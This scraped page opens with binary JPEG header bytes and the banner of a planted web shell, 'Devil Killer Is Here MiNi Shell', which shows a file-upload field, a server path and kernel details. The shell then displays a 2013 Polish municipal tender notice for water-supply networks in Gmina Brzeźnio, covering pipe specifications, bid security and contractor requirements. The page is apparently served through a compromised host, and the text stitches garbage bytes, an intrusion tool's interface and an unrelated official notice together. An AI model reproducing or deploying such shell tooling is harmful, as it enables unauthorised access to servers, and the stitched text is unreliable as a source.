JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130117/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130117/25054-N-2013.html

<p class="kh_header"><b>Brzeźnio: Budowa sieci wodociągowych w miejscowości Rydzew ( z wyszczególnieniem Rydzew A i Rydzew B), Pustelnik (Kolonia Gozdeckie), Brzeźnio (Brzeźnio ul. Spacerowa oraz Brzeźnio - Pustelnik), Nowa Wieś (Kolonia Nowa Wieś), Barczew, Krzaki.
jako etap I zadania inwestycyjnego pn.:
Rozbudowa sieci wodociągowych oraz budowa oczyszczalni ścieków jako II i III etap racjonalizacji gospodarki wodno-ściekowej Gminy Brzeźnio, mająca na celu poprawę warunków życia mieszkańców oraz infrastruktury technicznej.</b><br>
<b>Numer ogłoszenia: 25054 - 2013; data zamieszczenia: 17.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Brzeźnio , ul. Wspólna 44, 98-275 Brzeźnio, woj. łódzkie, tel. 043 8203026, 043 8203024, faks 043 8203671.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.brzeznio.finn.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa sieci wodociągowych w miejscowości Rydzew ( z wyszczególnieniem Rydzew A i Rydzew B), Pustelnik (Kolonia Gozdeckie), Brzeźnio (Brzeźnio ul. Spacerowa oraz Brzeźnio - Pustelnik), Nowa Wieś (Kolonia Nowa Wieś), Barczew, Krzaki.
jako etap I zadania inwestycyjnego pn.:
Rozbudowa sieci wodociągowych oraz budowa oczyszczalni ścieków jako II i III etap racjonalizacji gospodarki wodno-ściekowej Gminy Brzeźnio, mająca na celu poprawę warunków życia mieszkańców oraz infrastruktury technicznej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest robota budowlana:
Budowa sieci wodociągowych w miejscowości Rydzew ( z wyszczególnieniem Rydzew A i Rydzew B), Pustelnik (Kolonia Gozdeckie), Brzeźnio (Brzeźnio ul. Spacerowa oraz Brzeźnio - Pustelnik), Nowa Wieś (Kolonia Nowa Wieś), Barczew, Krzaki.
jako etap I zadania inwestycyjnego pn.:
Rozbudowa sieci wodociągowych oraz budowa oczyszczalni ścieków jako II i III etap racjonalizacji gospodarki wodno-ściekowej Gminy Brzeźnio, mająca na celu poprawę warunków życia mieszkańców oraz infrastruktury technicznej.


W ramach przedmiotu zamówienia wybudowane zostaną nowe odcinki wodociągowe:
1.	RYDZEW A (DŁUGOŚĆ ODCINKA - 1498,10 MB)
2.	RYDZEW B (DŁUGOŚĆ ODCINKA - 2044,95 MB)
3.	KOLONIA GOZDECKIE (DŁUGOŚĆ POŁĄCZENIA - 2713,10 MB)
4.	BRZEŹNIO UL. SPACEROWA (DŁUGOŚĆ ODCINKA - 612,60 MB)
5.	KOLONIA NOWA WIEŚ (DŁUGOŚĆ ODCINKA - 2001,70 MB)
6.	BRZEŹNIO - PUSTELNIK (DŁUGOŚĆ ODCINKA - 242,00 MB)
7.	BARCZEW (DŁUGOŚĆ ODCINKA - 1235,80 MB)
8.	KRZAKI (DŁUGOŚĆ ODCINKA - 278,20 MB)

Zadanie 1. Budowa sieci wodociągowej w miejscowości Rydzew A 

Wodociąg zaprojektowano z rur z PVC SDR26 PN10 o średnicy O 110/4,2mm (dł. 1498,1m) łączonych na uszczelkę oraz z rur TS (PE100+XS50) SDR11 o średnicy O 125/11,4mm (dł. 17,7m). Jako rurę ochronną zastosować rury TS (PE100+XS50) SDR11 o średnicy O 250/22,7mm (dł. 20,m). Na włączeniu i projektowanym wodociągu zaprojektowano zasuwy kołnierzowe, żeliwne O100, których wrzeciona należy wyprowadzić na powierzchnię terenu 
i umieścić w ulicznych skrzynkach żeliwnych.

Zadanie 2. Budowa sieci wodociągowej w miejscowości Rydzew B
Wodociąg zaprojektowano z rur z PVC SDR26 PN10 o średnicy  O 110/4,2mm (dł. 2044,95m) łączonych na uszczelkę. Jako rurę ochronną zastosować rury TS (PE100+XS50) SDR11 o średnicy  O 225/20,5mm (dł. 8,0m). Na włączeniu i projektowanym wodociągu zaprojektowano zasuwy kołnierzowe, żeliwne O100, których wrzeciona należy wyprowadzić na powierzchnię terenu i umieścić w ulicznych skrzynkach żeliwnych.

Zadanie 3. Budowa sieci wodociągowej w miejscowości Kolonia Gozdeckie (Pustelnik)

 Projektowany wodociąg wpiąć do istniejącego wodociągu  O 110. Włączenie do istniejącej sieci nastąpi przez zamontowanie trójnika i zasuw. Wodociąg zaprojektowano z rur z PVC SDR26 PN10 o średnicy O 110/4,2mm (dł.2713,1m) łączonych na uszczelkę oraz z rur TS (PE100+XS50) SDR11 o średnicy O 125/11,4mm (dł. 60,6m). Jako rurę ochronną zastosować rury TS (PE100+XS50) SDR11 o średnicy O 250/22,7mm (dł.63,8m). Na włączeniu 
i projektowanym wodociągu zaprojektowano zasuwy kołnierzowe, żeliwne O100, których wrzeciona należy wyprowadzić na powierzchnie terenu i umieścić w ulicznych skrzynkach żeliwnych. Ponadto na trasie wodociągu zaprojektowano automatyczny zawór napowietrzająco - odpowietrzający oraz podziemne hydranty p.poż. gwarantujące prawidłową wydajność i nadciśnienie do celów p. poż. 

Zadanie 4. Budowa sieci wodociągowej w miejscowości  Brzeźnio ul. Spacerowa

Wodociąg zaprojektowano z rur z PVC SDR26 PN10 o średnicy O 110/4,2mm (dł. 612,6m) łączonych na uszczelkę oraz z rur TS (PE100+XS50) SDR11 o średnicy O 125/11,4mm (dł. 5,0m). Jako rurę ochronną zastosować rury TS (PE100+XS50) SDR11 o średnicy O 225/20,5mm (dł. 10,0m).

Zadanie 5. Budowa sieci wodociągowej w miejscowości  Kolonia Nowa Wieś (Nowa Wieś)

Wodociąg zaprojektowano z rur z PVC SDR26 PN10 o średnicy O 110/4,2mm (dł. 2061,5m) łączonych na uszczelkę oraz z rur TS (PE100+XS50) SDR11 o średnicy O 125/11,4mm (dł. 206,8m). Jako rurę ochronną zastosować rury TS (PE100+XS50) SDR11 o średnicy O 250/22,7mm (dł. 175,3m).

Zadanie 6. Budowa sieci wodociągowej w miejscowości  Brzeźnio - Pustelnik

Projektowany wodociąg wpiąć do istniejącego wodociągu O 110 w ul. Sieradzkiej. Włączenie do istniejącej sieci nastąpi przez zamontowanie trójnika i zasuw. Wodociąg zaprojektowano z rur z PVC SDR 26 PN10 o średnicy O 110/4,2mm (dł. 242,0m) łączonych na uszczelkę oraz z rur TS (PE 100+XS50) SDR 11 o średnicy O 125/11,4mm (dł. 30,2m). Jako rurę ochronną zastosować rury TS (PE 100+XS50) SDR 11 o średnicy O 250/22,7mm (dł. 21,2m). Na włączeniu i projektowanym wodociągu zaprojektowano zasuwy kołnierzowe, żeliwne O100 (patrz zał.), których wrzeciona należy wyprowadzić na powierzchnie terenu i umieścić w ulicznych skrzynkach żeliwnych. Ponadto na trasie wodociągu zaprojektowano automatyczny zawór napowietrzająco - odpowietrzający oraz podziemne hydranty p.poż. gwarantujące prawidłową wydajność i nadciśnienie do celów p. poż.

Zadanie 7. Budowa sieci wodociągowej w miejscowości  Barczew

Projektowany wodociąg wpiąć do istniejącego wodociągu O 110. Włączenie do istniejącej sieci nastąpi przez zamontowanie trójnika i zasuw. Wodociąg zaprojektowano z rur z PVC SDR26 PN10 o średnicy O 110/4,2mm (1235,8m) łączonych na uszczelkę. Jako rurę ochronną zastosować rury TS (PE100+XS50) SDR11 o średnicy O 250/22,7mm (dł. 3,9m). Na włączeniu i projektowanym wodociągu zaprojektowano zasuwy kołnierzowe, żeliwne O100, których wrzeciona należy wyprowadzić na powierzchnie terenu i umieścić w ulicznych skrzynkach żeliwnych. Ponadto na trasie wodociągu zaprojektowano automatyczny zawór napowietrzająco - odpowietrzający oraz podziemne hydranty p.poż. gwarantujące prawidłową wydajność i nadciśnienie do celów p. poż.

Zadanie 8. Budowa sieci wodociągowej w miejscowości  Krzaki

Projektowany wodociąg wpiąć do istniejącego wodociągu 110 na dz. 169 - obręb Krzaki. Włączenie do istniejącej sieci nastąpi przez zamontowanie trójnika i zasuw. Wodociąg zaprojektowano z rur z PVC SDR 21 PN10 o średnicy O 90/4,3mm (dł. 278,2m) łączonych na uszczelkę oraz z rur TS (PE 100+XS50) SDR 11 o średnicy O 110/10,0mm (dł. 17,0m). Jako rurę ochronną zastosować rury TS (PE 100+XS50) SDR 11 o średnicy O 225/20,5mm (dł. 17,0m). Na włączeniu i projektowanym wodociągu zaprojektowano zasuwy kołnierzowe, żeliwne O80 i O100, których wrzeciona należy wyprowadzić na powierzchnię terenu 
i umieścić w ulicznych skrzynkach żeliwnych. Ponadto na trasie wodociągu zaprojektowano nadziemne hydranty p.poż. gwarantujące prawidłową wydajność i nadciśnienie do celów 
p. poż.

W ramach przedmiotu zamówienia Wykonawca zobowiązany jest wykonać geodezyjną inwentaryzację powykonawczą.

Przed odbiorem  Wykonawca zobowiązany jest przedstawić pozytywne wyniki badań sanitarno - epidemiologicznych wody przeznaczonej do spożycia (zgodnie 
z obowiązującymi przepisami).

Przedmiot zamówienia należy wykonać zgodnie z zasadami sztuki budowlanej.
WAŻNE:
Przedstawione w dokumentacji projektowej  przyłącza wodociągowe nie wchodzą 
w zakres przedmiotu zamówienia. Tak więc w ofercie przetargowej nie należy uwzględniać w/w prac.

Wykonawca zobowiązany jest do zapewnienia ciągłości dostaw wody podczas realizacji przedmiotu zamówienia, za wyjątkiem przerw koniecznych wynikających z technologii prac.

Wykonawca udzieli Zamawiającemu okresu gwarancji na przedmiot zamówienia 
minimum 60 miesięcy.
Okres rękojmi na wykonany przedmiot zamówienia jest równy okresowi gwarancji.

Szczegółowy opis przedmiotu zamówienia przedstawiony został w Rozdziale III  niniejszej SIWZ. 
Szczegółowy opis przedmiotu zamówienia stanowi dokumentacja projektowa i specyfikacje techniczne wykonania i odbioru robót. Kosztorysy nakładcze (ślepe) są wyłącznie elementem pomocniczym.
Przedmiot zamówienia określają projekty budowlane: 
SIEĆ WODOCIĄGOWA WRAZ Z PRZYŁĄCZAMI GMINA BRZEŹNIO - RYDZEW A
SIEĆ WODOCIĄGOWA WRAZ Z PRZYŁĄCZAMI GMINA BRZEŹNIO - RYDZEW B
SIEĆ WODOCIĄGOWA WRAZ Z PRZYŁĄCZAMI GMINA BRZEŹNIO - KOLONIA GOZDECKIE
SIEĆ WODOCIĄGOWA WRAZ Z PRZYŁĄCZAMI GMINA BRZEŹNIO - BRZEŹNIO, UL. SPACEROWA
SIEĆ WODOCIĄGOWA WRAZ Z PRZYŁĄCZAMI W GMINIE BRZEŹNIO - KOLONIA NOWA WIEŚ
SIEĆ WODOCIĄGOWA WRAZ Z PRZYŁĄCZAMI GMINA BRZEŹNIO - BRZEŹNIO - PUSTELNIK
SIEĆ WODOCIĄGOWA WRAZ Z PRZYŁĄCZAMI GMINA BRZEŹNIO - BARCZEW
SIEĆ WODOCIĄGOWA WRAZ Z PRZYŁĄCZAMI GMINA BRZEŹNIO - KRZAKI


stanowiące załączniki do niniejszej specyfikacji istotnych warunków zamówienia.

Wykonawca wykona wszystkie roboty wynikające z dokumentacji projektowej, nawet wtedy, gdy nie zostały wcześniej ujęte w przedmiarach robót, a są niezbędne do realizacji przedmiotu zamówienia.

Jeżeli gdziekolwiek w niniejszej SIWZ (dokumentacji przetargowej tj. projekty budowlane, opisy techniczne, kosztorysy nakładcze i przedmiary robót)  pojawia się nazwa, marka lub typ wskazujący na konkretnego producenta, należy to interpretować, że określenie ma jedynie charakter przykładowy, a wykonawca sporządzając ofertę może uwzględnić wyrób każdego innego producenta, który jest równoważny tzn. posiada co najmniej takie same lub korzystniejsze parametry wydajnościowe i jakościowe oraz standard wykonania w stosunku do podanych w SIWZ przykładów. Parametry wydajnościowe i jakościowe zostały wskazane w dokumentacji projektowej.


Powyższe zmiany muszą być wykazane w załączonej tabeli Wykaz urządzeń i materiałów równoważnych i dołączone do oferty - załącznik nr 10 do SIWZ. Brak wskazania 
w załączniku propozycji zastosowania urządzeń i materiałów równoważnych oznaczać będzie deklarację wykonawcy, że przedmiot zamówienia zostanie wykonany przy zastosowaniu urządzeń i materiałów przyjętych w projekcie budowlanym. Udowodnienie, że urządzenia 
i materiały są równoważne spoczywa na wykonawcy na etapie składania ofert. Dokumenty potwierdzające równoważność należy załączyć do oferty.  (art. 30 ust. 5 ustawy Pzp)
Zamawiający zastrzega sobie prawo do oceny równoważności proponowanych rozwiązań.
Zamawiający zastrzega sobie także prawo do korzystania z opinii ekspertów..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie w okresie 3 lat od podpisania umowy zamówień uzupełniających, o których mowa w art. 67, ust. 1, pkt 6 Prawo zamówień publicznych. Zamawiający przewiduje udzielić zamówienia uzupełniające do wysokości 20% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.11.12.00-0, 45.23.31.40-2, 45.23.13.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.08.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Oferta musi być zabezpieczona wadium w wysokości 35 000,00 (słownie: trzydzieści pięć tysięcy złotych) wniesionym przed upływem terminu składania ofert.
2.	Wadium musi być wniesione przed upływem terminu składania ofert (04 lutego 2013 roku godz. 10.00).
3.	Wadium może być wniesione w jednej lub kilku następujących formach:
a)	pieniądzu, 
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c)	gwarancjach bankowych, 
d)	gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, ze zm.).

4.	Wadium wnoszone w pieniądzu wpłaca się na rachunek Zamawiającego: nr rachunku 
28 9267 0006 0030 1950 3000 0040 Bank Spółdzielczy w Sieradzu, Oddział 
w Brzeźniu, ul. Wspólna 39, 98-275 Brzeźnio.
5.	Jeżeli wadium zostanie wniesione w pieniądzu, przelewem, Wykonawca proszony jest o dołączenie do oferty kserokopii wpłaty wadium z potwierdzeniem dokonanego przelewu. Na poleceniu przelewu należy wpisać: Wadium - 
Budowa sieci wodociągowych w miejscowości Rydzew ( z wyszczególnieniem Rydzew A i Rydzew B), Pustelnik (Kolonia Gozdeckie), Brzeźnio (Brzeźnio ul. Spacerowa oraz Brzeźnio - Pustelnik), Nowa Wieś (Kolonia Nowa Wieś), Barczew, Krzaki.

6.	 W przypadku wnoszenia wadium przelewem na rachunek bankowy, o jego wniesieniu w terminie decydować będzie data i godzina wpływu środków na rachunek bankowy Zamawiającego.
7.	Wadium wnoszone w formach wskazanych w pkt 3 lit. b) - e) należy, przed upływem terminu składania ofert, złożyć w formie oryginału w kasie Urzędu Gminy Brzeźnio, pok. Nr 3, lub złożyć razem z ofertą nie złączając z ofertą na stałe oryginalnego dokumentu potwierdzającego ustanowienie wadium. Do oferty należy załączyć potwierdzoną za zgodność z oryginałem kserokopię złożonego dokumentu. Treść dokumentu wadialnego powinna odwoływać się do sytuacji, w których zamawiający zatrzymuje wadium, określonych w art. 46 ust. 4a i 5 ustawy Pzp

8.	Wadium wnoszone w pieniądzu Zamawiający przechowuje na rachunku bankowym.
9.	W przypadku, gdy wadium wnoszone jest w innej formie niż pieniądz, Wykonawca powinien do oferty załączyć oryginał dowodu jego wniesienia.
10.	Wadium musi obejmować cały okres związania ofertą.
11.	Wykonawca, którego oferta nie będzie zabezpieczona akceptowaną formą wadium zostanie wykluczony z postępowania.
12.	Zamawiający zwróci wadium wszystkim Wykonawcom niezwłocznie po wyborze najkorzystniejszej oferty lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4 a ustawy Pzp.
13.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
1)	odmówił podpisania umowy na warunkach określonych w ofercie,
2)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
3)	zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustanawia szczegółowego warunku w tym zakresie. Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia o spełnianiu warunków udziału 
w postępowaniu złożonego przez Wykonawcę.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wykonał roboty budowlane na odcinku/ odcinkach o łącznej długości min. 10 km odpowiadające swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia, polegające na:
- budowie, przebudowie lub rozbudowie sieci wodociągowych z podaniem ich rodzaju 
i wartości, daty i miejsca wykonania oraz załączeniu dokumentu potwierdzającego, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustanawia warunku udziału w postępowaniu w zakresie dysponowania odpowiednim potencjałem technicznych. Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu złożonego przez Wykonawcę.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wskazać do wykonania niniejszego zamówienia posiadanie następujących osób wraz z informacją na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności oraz informację o podstawie do dysponowania tymi osobami:
- kierownik/kierownicy robót budowlanych posiadający uprawnienia budowlane 
w specjalności instalacyjnej w zakresie sieci wodociągowych lub sanitarnych,

Wykonawca załączy również do oferty oświadczenie, że osoby, które będą uczestniczyć 
w wykonywaniu zamówienia, posiadają wymagane uprawnienia budowlane 
w zakresie sieci wodociągowych lub sanitarnych (ze wskazaniem nr uprawnień).
Zamawiający uzna powyższe uprawnienia lub analogiczne na podstawie wcześniej obowiązujących przepisów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać na rachunku bankowym środki finansowe lub mieć zdolność kredytową  w wysokości nie mniejszej niż 2 mln zł.
W przypadku, gdy wykonawca wykazuje środki w innej walucie niż w złotych polskich, zamawiający dokona przeliczenia wartości w innej walucie na złote polskie na podstawie średniego kursu złotego w stosunku do walut obcych określonego w Tabeli Kursów Narodowego Banku Polskiego na przeddzień publikacji ogłoszenia o zamówieniu 
w Biuletynie Zamówień Publicznych (tj. 16.01.2013 roku).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
